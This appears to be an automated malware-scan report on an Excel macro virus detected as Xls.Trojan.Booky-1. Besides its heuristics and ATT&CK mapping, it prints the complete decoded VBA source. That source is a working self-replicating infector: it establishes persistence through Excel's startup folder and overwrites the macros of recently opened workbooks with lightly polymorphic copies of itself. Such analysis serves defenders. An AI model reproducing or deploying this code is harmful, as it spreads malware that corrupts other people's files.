MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
This Excel file contains a VBA macro with an Auto_Open subroutine, indicating it is designed to execute automatically upon opening. The macro attempts to save itself as 'Booky.xls' in the Excel startup path, suggesting an intent to infect other Excel files and establish persistence. The ClamAV detection name 'Xls.Trojan.Booky-1' further supports its classification as a malicious trojan.
Heuristics 3
-
ClamAV: Xls.Trojan.Booky-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Booky-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10107 bytes |
SHA-256: 7a81cef9d1f40618607754c3e09edd625a2271daea6dac643dd1ea753569e898 |
|||
|
Detection
ClamAV:
Xls.Trojan.Booky-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "booky"
Sub Auto_Open()
'Primul meu virus de ExCeL (semi polymorfic)
'CoDeNaMe: XL/ Booky
'
'Full comment:
'verifica daca e infect. PC-ul
On Error Resume Next
If Application.UserName <> "booky" Then
Application.UserName = "booky"
'daca nu, infecteaza PC-ul
ActiveWorkbook.SaveAs FileName:=Application.StartupPath + "\Booky.xls", FileFormat:=xlNormal, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
StatusBar = "BookY RuLz Hir...Hehehe"
End If
'Infecteaza 5 fisiere recente daca nu au fost deja inf.
Dim inf, nr, ln, xxx, poly, a, modul
'Verifica care e modulul original
For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(i).Name = "booky" Then modul = i
Next i
For i = 1 To Application.RecentFiles.Count
'deschide fis. daca nu e deja deschis
If nr >= 5 Then i = Application.RecentFiles.Count
If Application.RecentFiles(i).Path <> ThisWorkbook.Path + "\" + ThisWorkbook.Name Then Workbooks.Open FileName:=Application.RecentFiles(i).Path
inf = 0
'gaseste codul virusului in ce modul e
For n = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(n).Name = "booky" Then inf = inf + 1
Next n
If inf > 0 Then ActiveWorkbook.Close
If inf = 0 Then
nr = nr + 1
ActiveWorkbook.VBProject.VBComponents.Add vbext_ct_StdModule
'inf. toate modulele si creeaza unul nou, just in case!
For a = 1 To ActiveWorkbook.VBProject.VBComponents.Count
ActiveWorkbook.VBProject.VBComponents.Item(a).CodeModule.DeleteLines 1, ActiveWorkbook.VBProject.VBComponents.Item(a).CodeModule.CountOfLines
'copiaza codul virusului + ceva polymorf. (random chars)
For ln = 1 To ThisWorkbook.VBProject.VBComponents(modul).CodeModule.CountOfLines
xxx = ThisWorkbook.VBProject.VBComponents(modul).CodeModule.Lines(ln, 1)
poly = Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
strn = xxx + " '" + poly
ActiveWorkbook.VBProject.VBComponents.Item(a).CodeModule.InsertLines ln, strn
Next ln
Next a
'da numele noului modul ="booky" (sa stie ca l-a infectat)
ActiveWorkbook.VBProject.VBComponents(ActiveWorkbook.VBProject.VBComponents.Count).Name = "booky"
'salveaza si inchide fis.
ActiveWorkbook.Save
ActiveWorkbook.Close
End If
Next i
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/c2aec4aa84154486abcd866e5c277777.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/booky - 8293 bytes
' Line #0:
' FuncDefn (Sub Auto_Open())
' Line #1:
' QuoteRem 0x0000 0x002B "Primul meu virus de ExCeL (semi polymorfic)"
' Line #2:
' QuoteRem 0x0000 0x0013 "CoDeNaMe: XL/ Booky"
' Line #3:
' QuoteRem 0x0000 0x0000 ""
' Line #4:
' QuoteRem 0x0000 0x000D "Full comment:"
' Line #5:
' QuoteRem 0x0000 0x001D "verifica daca e infect. PC-ul"
' Line #6:
' OnError (Resume Next)
' Line #7:
' Ld Application
' MemLd UserName
' LitStr 0x0005 "booky"
'
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.